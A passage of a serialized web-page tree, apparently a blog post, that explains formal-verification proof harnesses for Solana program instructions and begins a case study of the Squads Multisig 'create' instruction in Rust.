assName":24347},[169],[24349,24359,24364,24369,24374],{"type":26,"tag":137,"props":24350,"children":24352},{"className":24351},[169,32],[24353],{"type":26,"tag":137,"props":24354,"children":24356},{"className":24355},[169],[24357],{"type":32,"value":24358},"invariant",{"type":26,"tag":137,"props":24360,"children":24362},{"className":24361},[162],[24363],{"type":32,"value":165},{"type":26,"tag":137,"props":24365,"children":24367},{"className":24366},[169,170],[24368],{"type":32,"value":41},{"type":26,"tag":137,"props":24370,"children":24372},{"className":24371},[169,170],[24373],{"type":32,"value":24263},{"type":26,"tag":137,"props":24375,"children":24377},{"className":24376},[197],[24378],{"type":32,"value":200},{"type":26,"tag":35,"props":24380,"children":24381},{},[24382],{"type":26,"tag":130,"props":24383,"children":24385},{"className":24384},[133,134],[24386],{"type":26,"tag":137,"props":24387,"children":24389},{"className":24388},[140],[24390],{"type":26,"tag":137,"props":24391,"children":24393},{"className":24392,"ariaHidden":146},[145],[24394,24425],{"type":26,"tag":137,"props":24395,"children":24397},{"className":24396},[151],[24398,24402,24407,24412,24416,24421],{"type":26,"tag":137,"props":24399,"children":24401},{"className":24400,"style":1512},[156],[],{"type":26,"tag":137,"props":24403,"children":24405},{"className":24404,"style":1731},[169,170],[24406],{"type":32,"value":24181},{"type":26,"tag":137,"props":24408,"children":24410},{"className":24409},[169],[24411],{"type":32,"value":878},{"type":26,"tag":137,"props":24413,"children":24415},{"className":24414,"style":281},[184],[],{"type":26,"tag":137,"props":24417,"children":24419},{"className":24418},[286],[24420],{"type":32,"value":24196},{"type":26,"tag":137,"props":24422,"children":24424},{"className":24423,"style":281},[184],[],{"type":26,"tag":137,"props":24426,"children":24428},{"className":24427},[151],[24429,24433,24556,24560],{"type":26,"tag":137,"props":24430,"children":24432},{"className":24431,"style":24208},[156],[],{"type":26,"tag":137,"props":24434,"children":24436},{"className":24435},[3722],[24437,24442],{"type":26,"tag":137,"props":24438,"children":24440},{"className":24439,"style":3725},[3722,3723,3724],[24441],{"type":32,"value":24219},{"type":26,"tag":137,"props":24443,"children":24445},{"className":24444},[236],[24446],{"type":26,"tag":137,"props":24447,"children":24449},{"className":24448},[241,417],[24450,24545],{"type":26,"tag":137,"props":24451,"children":24453},{"className":24452},[246],[24454,24540],{"type":26,"tag":137,"props":24455,"children":24457},{"className":24456,"style":24235},[251],[24458],{"type":26,"tag":137,"props":24459,"children":24460},{"style":24239},[24461,24465],{"type":26,"tag":137,"props":24462,"children":24464},{"className":24463,"style":262},[261],[],{"type":26,"tag":137,"props":24466,"children":24468},{"className":24467},[267,268,269,270],[24469],{"type":26,"tag":137,"props":24470,"children":24472},{"className":24471},[169,270],[24473,24478,24483,24492,24497,24506,24515,24520,24525,24530,24535],{"type":26,"tag":137,"props":24474,"children":24476},{"className":24475},[169,170,270],[24477],{"type":32,"value":41},{"type":26,"tag":137,"props":24479,"children":24481},{"className":24480},[169,170,270],[24482],{"type":32,"value":24263},{"type":26,"tag":137,"props":24484,"children":24486},{"className":24485},[184,270],[24487],{"type":26,"tag":137,"props":24488,"children":24490},{"className":24489},[270],[24491],{"type":32,"value":24273},{"type":26,"tag":137,"props":24493,"children":24495},{"className":24494},[286,270],[24496],{"type":32,"value":24279},{"type":26,"tag":137,"props":24498,"children":24500},{"className":24499},[184,270],[24501],{"type":26,"tag":137,"props":24502,"children":24504},{"className":24503},[270],[24505],{"type":32,"value":24273},{"type":26,"tag":137,"props":24507,"children":24509},{"className":24508},[169,32,270],[24510],{"type":26,"tag":137,"props":24511,"children":24513},{"className":24512},[169,270],[24514],{"type":32,"value":24121},{"type":26,"tag":137,"props":24516,"children":24518},{"className":24517},[162,270],[24519],{"type":32,"value":165},{"type":26,"tag":137,"props":24521,"children":24523},{"className":24522},[169,170,270],[24524],{"type":32,"value":4326},{"type":26,"tag":137,"props":24526,"children":24528},{"className":24527},[169,170,270],[24529],{"type":32,"value":24313},{"type":26,"tag":137,"props":24531,"children":24533},{"className":24532},[169,170,270],[24534],{"type":32,"value":173},{"type":26,"tag":137,"props":24536,"children":24538},{"className":24537},[197,270],[24539],{"type":32,"value":200},{"type":26,"tag":137,"props":24541,"children":24543},{"className":24542},[453],[24544],{"type":32,"value":456},{"type":26,"tag":137,"props":24546,"children":24548},{"className":24547},[246],[24549],{"type":26,"tag":137,"props":24550,"children":24552},{"className":24551,"style":24336},[251],[24553],{"type":26,"tag":137,"props":24554,"children":24555},{},[],{"type":26,"tag":137,"props":24557,"children":24559},{"className":24558,"style":185},[184],[],{"type":26,"tag":137,"props":24561,"children":24563},{"className":24562},[169],[24564,24573,24578,24583,24588],{"type":26,"tag":137,"props":24565,"children":24567},{"className":24566},[169,32],[24568],{"type":26,"tag":137,"props":24569,"children":24571},{"className":24570},[169],[24572],{"type":32,"value":24358},{"type":26,"tag":137,"props":24574,"children":24576},{"className":24575},[162],[24577],{"type":32,"value":165},{"type":26,"tag":137,"props":24579,"children":24581},{"className":24580},[169,170],[24582],{"type":32,"value":41},{"type":26,"tag":137,"props":24584,"children":24586},{"className":24585},[169,170],[24587],{"type":32,"value":24263},{"type":26,"tag":137,"props":24589,"children":24591},{"className":24590},[197],[24592],{"type":32,"value":200},{"type":26,"tag":35,"props":24594,"children":24595},{},[24596],{"type":32,"value":24597},"Our instruction invariants are represented as:",{"type":26,"tag":3426,"props":24599,"children":24600},{},[24601,24637],{"type":26,"tag":3430,"props":24602,"children":24603},{},[24604,24631,24632],{"type":26,"tag":130,"props":24605,"children":24607},{"className":24606},[133,134],[24608],{"type":26,"tag":137,"props":24609,"children":24611},{"className":24610},[140],[24612],{"type":26,"tag":137,"props":24613,"children":24615},{"className":24614,"ariaHidden":146},[145],[24616],{"type":26,"tag":137,"props":24617,"children":24619},{"className":24618},[151],[24620,24624],{"type":26,"tag":137,"props":24621,"children":24623},{"className":24622,"style":1512},[156],[],{"type":26,"tag":137,"props":24625,"children":24628},{"className":24626,"style":24627},[169,170],"margin-right:0.05764em;",[24629],{"type":32,"value":24630},"S",{"type":32,"value":17923},{"type":26,"tag":130,"props":24633,"children":24635},{"className":24634},[],[24636],{"type":32,"value":22748},{"type":26,"tag":3430,"props":24638,"children":24639},{},[24640,24666,24667],{"type":26,"tag":130,"props":24641,"children":24643},{"className":24642},[133,134],[24644],{"type":26,"tag":137,"props":24645,"children":24647},{"className":24646},[140],[24648],{"type":26,"tag":137,"props":24649,"children":24651},{"className":24650,"ariaHidden":146},[145],[24652],{"type":26,"tag":137,"props":24653,"children":24655},{"className":24654},[151],[24656,24660],{"type":26,"tag":137,"props":24657,"children":24659},{"className":24658,"style":1512},[156],[],{"type":26,"tag":137,"props":24661,"children":24663},{"className":24662,"style":24627},[169,170],[24664],{"type":32,"value":24665},"E",{"type":32,"value":17923},{"type":26,"tag":130,"props":24668,"children":24670},{"className":24669},[],[24671],{"type":32,"value":22755},{"type":26,"tag":35,"props":24673,"children":24674},{},[24675,24677,24703,24705,24710,24712,24718],{"type":32,"value":24676},"And ",{"type":26,"tag":130,"props":24678,"children":24680},{"className":24679},[133,134],[24681],{"type":26,"tag":137,"props":24682,"children":24684},{"className":24683},[140],[24685],{"type":26,"tag":137,"props":24686,"children":24688},{"className":24687,"ariaHidden":146},[145],[24689],{"type":26,"tag":137,"props":24690,"children":24692},{"className":24691},[151],[24693,24697],{"type":26,"tag":137,"props":24694,"children":24696},{"className":24695,"style":1512},[156],[],{"type":26,"tag":137,"props":24698,"children":24700},{"className":24699,"style":1843},[169,170],[24701],{"type":32,"value":24702},"K",{"type":32,"value":24704}," represents whether the instruction actually succeeds (i.e. invoking the handler returned an ",{"type":26,"tag":130,"props":24706,"children":24708},{"className":24707},[],[24709],{"type":32,"value":23083},{"type":32,"value":24711}," not an ",{"type":26,"tag":130,"props":24713,"children":24715},{"className":24714},[],[24716],{"type":32,"value":24717},"Err",{"type":32,"value":4437},{"type":26,"tag":35,"props":24720,"children":24721},{},[24722],{"type":32,"value":24723},"In order to verify these conditions we need to verify three cases:",{"type":26,"tag":118,"props":24725,"children":24727},{"id":24726},"account-invariants-1",[24728],{"type":32,"value":24729},"Account invariants",{"type":26,"tag":35,"props":24731,"children":24732},{},[24733,24735,24766,24768,24798,24800,24830],{"type":32,"value":24734},"After we execute an instruction, either the function should error and be reverted (",{"type":26,"tag":130,"props":24736,"children":24738},{"className":24737},[133,134],[24739],{"type":26,"tag":137,"props":24740,"children":24742},{"className":24741},[140],[24743],{"type":26,"tag":137,"props":24744,"children":24746},{"className":24745,"ariaHidden":146},[145],[24747],{"type":26,"tag":137,"props":24748,"children":24750},{"className":24749},[151],[24751,24755,24761],{"type":26,"tag":137,"props":24752,"children":24754},{"className":24753,"style":1512},[156],[],{"type":26,"tag":137,"props":24756,"children":24758},{"className":24757},[169],[24759],{"type":32,"value":24760},"¬",{"type":26,"tag":137,"props":24762,"children":24764},{"className":24763,"style":1843},[169,170],[24765],{"type":32,"value":24702},{"type":32,"value":24767},") or the account post-invariants should hold (",{"type":26,"tag":130,"props":24769,"children":24771},{"className":24770},[133,134],[24772],{"type":26,"tag":137,"props":24773,"children":24775},{"className":24774},[140],[24776],{"type":26,"tag":137,"props":24777,"children":24779},{"className":24778,"ariaHidden":146},[145],[24780],{"type":26,"tag":137,"props":24781,"children":24783},{"className":24782},[151],[24784,24788,24793],{"type":26,"tag":137,"props":24785,"children":24787},{"className":24786,"style":1512},[156],[],{"type":26,"tag":137,"props":24789,"children":24791},{"className":24790,"style":1731},[169,170],[24792],{"type":32,"value":24181},{"type":26,"tag":137,"props":24794,"children":24796},{"className":24795},[169],[24797],{"type":32,"value":878},{"type":32,"value":24799},"). Furthermore, we can assume that before executing a function, the account pre-invariants (",{"type":26,"tag":130,"props":24801,"children":24803},{"className":24802},[133,134],[24804],{"type":26,"tag":137,"props":24805,"children":24807},{"className":24806},[140],[24808],{"type":26,"tag":137,"props":24809,"children":24811},{"className":24810,"ariaHidden":146},[145],[24812],{"type":26,"tag":137,"props":24813,"children":24815},{"className":24814},[151],[24816,24820,24825],{"type":26,"tag":137,"props":24817,"children":24819},{"className":24818,"style":1512},[156],[],{"type":26,"tag":137,"props":24821,"children":24823},{"className":24822,"style":1731},[169,170],[24824],{"type":32,"value":24181},{"type":26,"tag":137,"props":24826,"children":24828},{"className":24827},[169],[24829],{"type":32,"value":1817},{"type":32,"value":24831},") should hold since we will verify all of the functions eventually.",{"type":26,"tag":35,"props":24833,"children":24834},{},[24835,24837],{"type":32,"value":24836},"So we are trying to prove that ",{"type":26,"tag":130,"props":24838,"children":24840},{"className":24839},[133,134],[24841],{"type":26,"tag":137,"props":24842,"children":24844},{"className":24843},[140],[24845],{"type":26,"tag":137,"props":24846,"children":24848},{"className":24847,"ariaHidden":146},[145],[24849,24886,24918],{"type":26,"tag":137,"props":24850,"children":24852},{"className":24851},[151],[24853,24857,24862,24867,24872,24876,24882],{"type":26,"tag":137,"props":24854,"children":24856},{"className":24855,"style":157},[156],[],{"type":26,"tag":137,"props":24858,"children":24860},{"className":24859},[162],[24861],{"type":32,"value":165},{"type":26,"tag":137,"props":24863,"children":24865},{"className":24864,"style":1731},[169,170],[24866],{"type":32,"value":24181},{"type":26,"tag":137,"props":24868,"children":24870},{"className":24869},[169],[24871],{"type":32,"value":1817},{"type":26,"tag":137,"props":24873,"children":24875},{"className":24874,"style":348},[184],[],{"type":26,"tag":137,"props":24877,"children":24879},{"className":24878},[353],[24880],{"type":32,"value":24881},"∧",{"type":26,"tag":137,"props":24883,"children":24885},{"className":24884,"style":348},[184],[],{"type":26,"tag":137,"props":24887,"children":24889},{"className":24888},[151],[24890,24894,24899,24904,24908,24914],{"type":26,"tag":137,"props":24891,"children":24893},{"className":24892,"style":157},[156],[],{"type":26,"tag":137,"props":24895,"children":24897},{"className":24896,"style":1843},[169,170],[24898],{"type":32,"value":24702},{"type":26,"tag":137,"props":24900,"children":24902},{"className":24901},[197],[24903],{"type":32,"value":200},{"type":26,"tag":137,"props":24905,"children":24907},{"className":24906,"style":281},[184],[],{"type":26,"tag":137,"props":24909,"children":24911},{"className":24910},[286],[24912],{"type":32,"value":24913},"→",{"type":26,"tag":137,"props":24915,"children":24917},{"className":24916,"style":281},[184],[],{"type":26,"tag":137,"props":24919,"children":24921},{"className":24920},[151],[24922,24926,24931],{"type":26,"tag":137,"props":24923,"children":24925},{"className":24924,"style":1512},[156],[],{"type":26,"tag":137,"props":24927,"children":24929},{"className":24928,"style":1731},[169,170],[24930],{"type":32,"value":24181},{"type":26,"tag":137,"props":24932,"children":24934},{"className":24933},[169],[24935],{"type":32,"value":878},{"type":26,"tag":35,"props":24937,"children":24938},{},[24939],{"type":32,"value":24940},"We can construct a proof harness like the following:",{"type":26,"tag":5512,"props":24942,"children":24944},{"code":24943,"language":22053,"meta":7,"className":22054,"style":7},"assume(P0)\nres = instruction_handler(...)\nassert(!K || P1)\n",[24945],{"type":26,"tag":130,"props":24946,"children":24947},{"__ignoreMap":7},[24948,24956,24973],{"type":26,"tag":137,"props":24949,"children":24950},{"class":5559,"line":5560},[24951],{"type":26,"tag":137,"props":24952,"children":24953},{"style":5601},[24954],{"type":32,"value":24955},"assume(P0)\n",{"type":26,"tag":137,"props":24957,"children":24958},{"class":5559,"line":5412},[24959,24964,24968],{"type":26,"tag":137,"props":24960,"children":24961},{"style":5601},[24962],{"type":32,"value":24963},"res ",{"type":26,"tag":137,"props":24965,"children":24966},{"style":5590},[24967],{"type":32,"value":289},{"type":26,"tag":137,"props":24969,"children":24970},{"style":5601},[24971],{"type":32,"value":24972}," instruction_handler(...)\n",{"type":26,"tag":137,"props":24974,"children":24975},{"class":5559,"line":5417},[24976,24980,24984,24989,24994,24999],{"type":26,"tag":137,"props":24977,"children":24978},{"style":5610},[24979],{"type":32,"value":22577},{"type":26,"tag":137,"props":24981,"children":24982},{"style":5601},[24983],{"type":32,"value":165},{"type":26,"tag":137,"props":24985,"children":24987},{"style":24986},"--shiki-default:#F44747",[24988],{"type":32,"value":23215},{"type":26,"tag":137,"props":24990,"children":24991},{"style":5601},[24992],{"type":32,"value":24993},"K ",{"type":26,"tag":137,"props":24995,"children":24996},{"style":24986},[24997],{"type":32,"value":24998},"||",{"type":26,"tag":137,"props":25000,"children":25001},{"style":5601},[25002],{"type":32,"value":25003}," P1)\n",{"type":26,"tag":35,"props":25005,"children":25006},{},[25007],{"type":32,"value":25008},"By itself, this harness doesn't actually prove much. For example, if the instruction fails every time, this proof will still work. However, in conjunction with the two subsequent proofs we can be assured that the instruction will actually succeed when we expect it to.",{"type":26,"tag":118,"props":25010,"children":25012},{"id":25011},"positive-instruction-invariant",[25013],{"type":32,"value":25014},"Positive instruction invariant",{"type":26,"tag":35,"props":25016,"children":25017},{},[25018,25020,25026,25028,25079],{"type":32,"value":25019},"Next we need to prove that ",{"type":26,"tag":130,"props":25021,"children":25023},{"className":25022},[],[25024],{"type":32,"value":25025},"success_if",{"type":32,"value":25027}," is a sufficient condition for instruction success. I.e. ",{"type":26,"tag":130,"props":25029,"children":25031},{"className":25030},[133,134],[25032],{"type":26,"tag":137,"props":25033,"children":25035},{"className":25034},[140],[25036],{"type":26,"tag":137,"props":25037,"children":25039},{"className":25038,"ariaHidden":146},[145],[25040,25066],{"type":26,"tag":137,"props":25041,"children":25043},{"className":25042},[151],[25044,25048,25053,25057,25062],{"type":26,"tag":137,"props":25045,"children":25047},{"className":25046,"style":1512},[156],[],{"type":26,"tag":137,"props":25049,"children":25051},{"className":25050,"style":24627},[169,170],[25052],{"type":32,"value":24630},{"type":26,"tag":137,"props":25054,"children":25056},{"className":25055,"style":281},[184],[],{"type":26,"tag":137,"props":25058,"children":25060},{"className":25059},[286],[25061],{"type":32,"value":24913},{"type":26,"tag":137,"props":25063,"children":25065},{"className":25064,"style":281},[184],[],{"type":26,"tag":137,"props":25067,"children":25069},{"className":25068},[151],[25070,25074],{"type":26,"tag":137,"props":25071,"children":25073},{"className":25072,"style":1512},[156],[],{"type":26,"tag":137,"props":25075,"children":25077},{"className":25076,"style":1843},[169,170],[25078],{"type":32,"value":24702},{"type":32,"value":470},{"type":26,"tag":35,"props":25081,"children":25082},{},[25083],{"type":32,"value":25084},"Just like before we can construct a proof harness:",{"type":26,"tag":5512,"props":25086,"children":25088},{"code":25087,"language":22053,"meta":7,"className":22054,"style":7},"assume(S)\nres = instruction_handler(...)\nassert(K)\n",[25089],{"type":26,"tag":130,"props":25090,"children":25091},{"__ignoreMap":7},[25092,25100,25115],{"type":26,"tag":137,"props":25093,"children":25094},{"class":5559,"line":5560},[25095],{"type":26,"tag":137,"props":25096,"children":25097},{"style":5601},[25098],{"type":32,"value":25099},"assume(S)\n",{"type":26,"tag":137,"props":25101,"children":25102},{"class":5559,"line":5412},[25103,25107,25111],{"type":26,"tag":137,"props":25104,"children":25105},{"style":5601},[25106],{"type":32,"value":24963},{"type":26,"tag":137,"props":25108,"children":25109},{"style":5590},[25110],{"type":32,"value":289},{"type":26,"tag":137,"props":25112,"children":25113},{"style":5601},[25114],{"type":32,"value":24972},{"type":26,"tag":137,"props":25116,"children":25117},{"class":5559,"line":5417},[25118,25122],{"type":26,"tag":137,"props":25119,"children":25120},{"style":5610},[25121],{"type":32,"value":22577},{"type":26,"tag":137,"props":25123,"children":25124},{"style":5601},[25125],{"type":32,"value":25126},"(K)\n",{"type":26,"tag":35,"props":25128,"children":25129},{},[25130,25132,25137,25139,25151],{"type":32,"value":25131},"This proof assures that whenever ",{"type":26,"tag":130,"props":25133,"children":25135},{"className":25134},[],[25136],{"type":32,"value":22748},{"type":32,"value":25138}," is satisfied, the instruction will succeed. However, remember that since this is not a biconditional, the instruction may also succeed ",{"type":26,"tag":762,"props":25140,"children":25141},{},[25142,25144,25149],{"type":32,"value":25143},"even if ",{"type":26,"tag":130,"props":25145,"children":25147},{"className":25146},[],[25148],{"type":32,"value":22748},{"type":32,"value":25150}," is not satisfied",{"type":32,"value":25152},". To specify explicit error conditions we need our third and final proof.",{"type":26,"tag":118,"props":25154,"children":25156},{"id":25155},"_3-negative-instruction-invariant",[25157],{"type":32,"value":25158},"3. Negative instruction invariant",{"type":26,"tag":35,"props":25160,"children":25161},{},[25162,25164,25169,25171,25227],{"type":32,"value":25163},"Finally, we want to prove that ",{"type":26,"tag":130,"props":25165,"children":25167},{"className":25166},[],[25168],{"type":32,"value":22755},{"type":32,"value":25170}," is a sufficient condition for instruction failure. I.e. ",{"type":26,"tag":130,"props":25172,"children":25174},{"className":25173},[133,134],[25175],{"type":26,"tag":137,"props":25176,"children":25178},{"className":25177},[140],[25179],{"type":26,"tag":137,"props":25180,"children":25182},{"className":25181,"ariaHidden":146},[145],[25183,25209],{"type":26,"tag":137,"props":25184,"children":25186},{"className":25185},[151],[25187,25191,25196,25200,25205],{"type":26,"tag":137,"props":25188,"children":25190},{"className":25189,"style":1512},[156],[],{"type":26,"tag":137,"props":25192,"children":25194},{"className":25193,"style":24627},[169,170],[25195],{"type":32,"value":24665},{"type":26,"tag":137,"props":25197,"children":25199},{"className":25198,"style":281},[184],[],{"type":26,"tag":137,"props":25201,"children":25203},{"className":25202},[286],[25204],{"type":32,"value":24913},{"type":26,"tag":137,"props":25206,"children":25208},{"className":25207,"style":281},[184],[],{"type":26,"tag":137,"props":25210,"children":25212},{"className":25211},[151],[25213,25217,25222],{"type":26,"tag":137,"props":25214,"children":25216},{"className":25215,"style":1512},[156],[],{"type":26,"tag":137,"props":25218,"children":25220},{"className":25219},[169],[25221],{"type":32,"value":24760},{"type":26,"tag":137,"props":25223,"children":25225},{"className":25224,"style":1843},[169,170],[25226],{"type":32,"value":24702},{"type":32,"value":470},{"type":26,"tag":35,"props":25229,"children":25230},{},[25231],{"type":32,"value":25232},"This harness looks just like the previous one:",{"type":26,"tag":5512,"props":25234,"children":25236},{"code":25235,"language":22053,"meta":7,"className":22054,"style":7},"assume(E)\nres = instruction_handler(...)\nassert(!K)\n",[25237],{"type":26,"tag":130,"props":25238,"children":25239},{"__ignoreMap":7},[25240,25248,25263],{"type":26,"tag":137,"props":25241,"children":25242},{"class":5559,"line":5560},[25243],{"type":26,"tag":137,"props":25244,"children":25245},{"style":5601},[25246],{"type":32,"value":25247},"assume(E)\n",{"type":26,"tag":137,"props":25249,"children":25250},{"class":5559,"line":5412},[25251,25255,25259],{"type":26,"tag":137,"props":25252,"children":25253},{"style":5601},[25254],{"type":32,"value":24963},{"type":26,"tag":137,"props":25256,"children":25257},{"style":5590},[25258],{"type":32,"value":289},{"type":26,"tag":137,"props":25260,"children":25261},{"style":5601},[25262],{"type":32,"value":24972},{"type":26,"tag":137,"props":25264,"children":25265},{"class":5559,"line":5417},[25266,25270,25274,25278],{"type":26,"tag":137,"props":25267,"children":25268},{"style":5610},[25269],{"type":32,"value":22577},{"type":26,"tag":137,"props":25271,"children":25272},{"style":5601},[25273],{"type":32,"value":165},{"type":26,"tag":137,"props":25275,"children":25276},{"style":24986},[25277],{"type":32,"value":23215},{"type":26,"tag":137,"props":25279,"children":25280},{"style":5601},[25281],{"type":32,"value":25282},"K)\n",{"type":26,"tag":35,"props":25284,"children":25285},{},[25286,25288,25292],{"type":32,"value":25287},"With these three harnesses, we are now able to formally verify that instructions succeed or fail when we expect them to ",{"type":26,"tag":762,"props":25289,"children":25290},{},[25291],{"type":32,"value":18964},{"type":32,"value":25293}," the account invariants we expect are always being preserved.",{"type":26,"tag":92,"props":25295,"children":25297},{"id":25296},"case-study-squads-multisig",[25298],{"type":32,"value":25299},"Case study: Squads Multisig",{"type":26,"tag":35,"props":25301,"children":25302},{},[25303,25305,25310],{"type":32,"value":25304},"During our research, we focused on formally verifying aspects of the ",{"type":26,"tag":41,"props":25306,"children":25308},{"href":21416,"rel":25307},[45],[25309],{"type":32,"value":21420},{"type":32,"value":470},{"type":26,"tag":35,"props":25312,"children":25313},{},[25314,25316,25322,25324,25330],{"type":32,"value":25315},"The program defines a Multisig account (",{"type":26,"tag":130,"props":25317,"children":25319},{"className":25318},[],[25320],{"type":32,"value":25321},"Ms",{"type":32,"value":25323},") which has multiple members. These members can propose and then vote on transactions to execute on behalf of the multisig. If at least some ",{"type":26,"tag":130,"props":25325,"children":25327},{"className":25326},[],[25328],{"type":32,"value":25329},"threshold",{"type":32,"value":25331}," of members vote yes, the transaction will be invoked. Additionally, there is functionality to add/remove users and update the threshold.",{"type":26,"tag":35,"props":25333,"children":25334},{},[25335],{"type":32,"value":25336},"In practice, this structure provides a useful way to distribute authority across a group of individuals. From a formal verification perspective, it has both stateless and stateful features and constraints that provided a good testbed for our tooling.",{"type":26,"tag":35,"props":25338,"children":25339},{},[25340],{"type":32,"value":25341},"In this section we will go through a few examples of properties that we can verify on this program:",{"type":26,"tag":4820,"props":25343,"children":25344},{},[25345,25350,25355,25360],{"type":26,"tag":3430,"props":25346,"children":25347},{},[25348],{"type":32,"value":25349},"Incrementally verifying minimum requirements to create a multisig",{"type":26,"tag":3430,"props":25351,"children":25352},{},[25353],{"type":32,"value":25354},"Verify threshold requirements",{"type":26,"tag":3430,"props":25356,"children":25357},{},[25358],{"type":32,"value":25359},"Verify requirements to remove a member",{"type":26,"tag":3430,"props":25361,"children":25362},{},[25363],{"type":32,"value":25364},"Safety guarantees",{"type":26,"tag":118,"props":25366,"children":25368},{"id":25367},"_1-incrementally-verifying-minimum-requirements-to-create-a-multisig",[25369],{"type":32,"value":25370},"1. Incrementally verifying minimum requirements to create a multisig",{"type":26,"tag":35,"props":25372,"children":25373},{},[25374,25376,25381],{"type":32,"value":25375},"Suppose we want to verify the minimum requirements to create a multisig, i.e. the ",{"type":26,"tag":130,"props":25377,"children":25379},{"className":25378},[],[25380],{"type":32,"value":22748},{"type":32,"value":25382}," expression.",{"type":26,"tag":35,"props":25384,"children":25385},{},[25386,25388,25393,25395,25401],{"type":32,"value":25387},"Creating a multisig (",{"type":26,"tag":130,"props":25389,"children":25391},{"className":25390},[],[25392],{"type":32,"value":25321},{"type":32,"value":25394},") requires invoking the ",{"type":26,"tag":130,"props":25396,"children":25398},{"className":25397},[],[25399],{"type":32,"value":25400},"create",{"type":32,"value":25402}," instruction:",{"type":26,"tag":5512,"props":25404,"children":25406},{"code":25405,"language":5551,"meta":7,"className":5552,"style":7},"#[derive(Accounts)]\n#[instruction(threshold: u16, create_key: Pubkey, members: Vec\u003CPubkey>)]\npub struct Create\u003C'info> {\n    #[account(\n        init,\n        payer = creator,\n        space = Ms::SIZE_WITHOUT_MEMBERS + (members.len() * 32),\n        seeds = [b\"squad\", create_key.as_ref(), b\"multisig\"], bump\n    )]\n    pub multisig: Account\u003C'info, Ms>,\n\n    #[account(mut)]\n    pub creator: Signer\u003C'info>,\n    pub system_program: Program\u003C'info, System>,\n}\n\npub fn create(\n    ctx: Context\u003CCreate>,\n    threshold: u16,\n    create_key: Pubkey,\n    members: Vec\u003CPubkey>,\n) -> Result\u003C()> {\n    // sort the members and remove duplicates\n    let mut members = members;\n    members.sort();\n    members.dedup();\n\n    // check we don't exceed u16\n    let total_members = members.len();\n    if total_members \u003C 1 {\n        return err!(MsError::EmptyMembers);\n    }\n\n    // make sure we don't exceed u16 on first call\n    if total_members > usize::from(u16::MAX) {\n        return err!(MsError::MaxMembersReached);\n    }\n\n    // make sure threshold is valid\n    if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n        return err!(MsError::InvalidThreshold);\n    }\n\n    ctx.accounts.multisig.init(\n        threshold,\n        create_key,\n        members,\n        *ctx.bumps.get(\"multisig\").unwrap(),\n    )\n}\n",[25407],{"type":26,"tag":130,"props":25408,"children":25409},{"__ignoreMap":7},[25410,25427,25482,25512,25520,25528,25545,25596,25646,25654,25695,25702,25718,25751,25793,25800,25807,25826,25854,25874,25894,25922,25941,25949,25977,25997,26017,26024,26032,26064,26087,26122,26130,26138,26147,26189,26222,26230,26238,26247,26323,26356,26364,26372,26409,26422,26435,26448,26502,26511],{"type":26,"tag":137,"props":25411,"children":25412},{"class":5559,"line":5560},[25413,25418,25423],{"type":26,"tag":137,"props":25414,"children":25415},{"style":5601},[25416],{"type":32,"value":25417},"#[derive(",{"type":26,"tag":137,"props":25419,"children":25420},{"style":6009},[25421],{"type":32,"value":25422},"Accounts",{"type":26,"tag":137,"props":25424,"children":25425},{"style":5601},[25426],{"type":32,"value":22852},{"type":26,"tag":137,"props":25428,"children":25429},{"class":5559,"line":5412},[25430,25435,25439,25443,25448,25452,25456,25461,25465,25469,25473,25477],{"type":26,"tag":137,"props":25431,"children":25432},{"style":5601},[25433],{"type":32,"value":25434},"#[instruction(threshold",{"type":26,"tag":137,"props":25436,"children":25437},{"style":5590},[25438],{"type":32,"value":7072},{"type":26,"tag":137,"props":25440,"children":25441},{"style":6009},[25442],{"type":32,"value":23623},{"type":26,"tag":137,"props":25444,"children":25445},{"style":5601},[25446],{"type":32,"value":25447},", create_key",{"type":26,"tag":137,"props":25449,"children":25450},{"style":5590},[25451],{"type":32,"value":7072},{"type":26,"tag":137,"props":25453,"children":25454},{"style":6009},[25455],{"type":32,"value":23450},{"type":26,"tag":137,"props":25457,"children":25458},{"style":5601},[25459],{"type":32,"value":25460},", members",{"type":26,"tag":137,"props":25462,"children":25463},{"style":5590},[25464],{"type":32,"value":7072},{"type":26,"tag":137,"props":25466,"children":25467},{"style":6009},[25468],{"type":32,"value":23982},{"type":26,"tag":137,"props":25470,"children":25471},{"style":5601},[25472],{"type":32,"value":8391},{"type":26,"tag":137,"props":25474,"children":25475},{"style":6009},[25476],{"type":32,"value":23991},{"type":26,"tag":137,"props":25478,"children":25479},{"style":5601},[25480],{"type":32,"value":25481},">)]\n",{"type":26,"tag":137,"props":25483,"children":25484},{"class":5559,"line":5417},[25485,25489,25493,25498,25503,25508],{"type":26,"tag":137,"props":25486,"children":25487},{"style":5573},[25488],{"type":32,"value":16281},{"type":26,"tag":137,"props":25490,"children":25491},{"style":5573},[25492],{"type":32,"value":23744},{"type":26,"tag":137,"props":25494,"children":25495},{"style":6009},[25496],{"type":32,"value":25497}," Create",{"type":26,"tag":137,"props":25499,"children":25500},{"style":5601},[25501],{"type":32,"value":25502},"\u003C'",{"type":26,"tag":137,"props":25504,"children":25505},{"style":6009},[25506],{"type":32,"value":25507},"info",{"type":26,"tag":137,"props":25509,"children":25510},{"style":5601},[25511],{"type":32,"value":9865},{"type":26,"tag":137,"props":25513,"children":25514},{"class":5559,"line":5642},[25515],{"type":26,"tag":137,"props":25516,"children":25517},{"style":5601},[25518],{"type":32,"value":25519},"    #[account(\n",{"type":26,"tag":137,"props":25521,"children":25522},{"class":5559,"line":5745},[25523],{"type":26,"tag":137,"props":25524,"children":25525},{"style":5601},[25526],{"type":32,"value":25527},"        init,\n",{"type":26,"tag":137,"props":25529,"children":25530},{"class":5559,"line":5850},[25531,25536,25540],{"type":26,"tag":137,"props":25532,"children":25533},{"style":5601},[25534],{"type":32,"value":25535},"        payer ",{"type":26,"tag":137,"props":25537,"children":25538},{"style":5590},[25539],{"type":32,"value":289},{"type":26,"tag":137,"props":25541,"children":25542},{"style":5601},[25543],{"type":32,"value":25544}," creator,\n",{"type":26,"tag":137,"props":25546,"children":25547},{"class":5559,"line":5878},[25548,25553,25557,25561,25565,25570,25574,25579,25583,25587,25591],{"type":26,"tag":137,"props":25549,"children":25550},{"style":5601},[25551],{"type":32,"value":25552},"        space 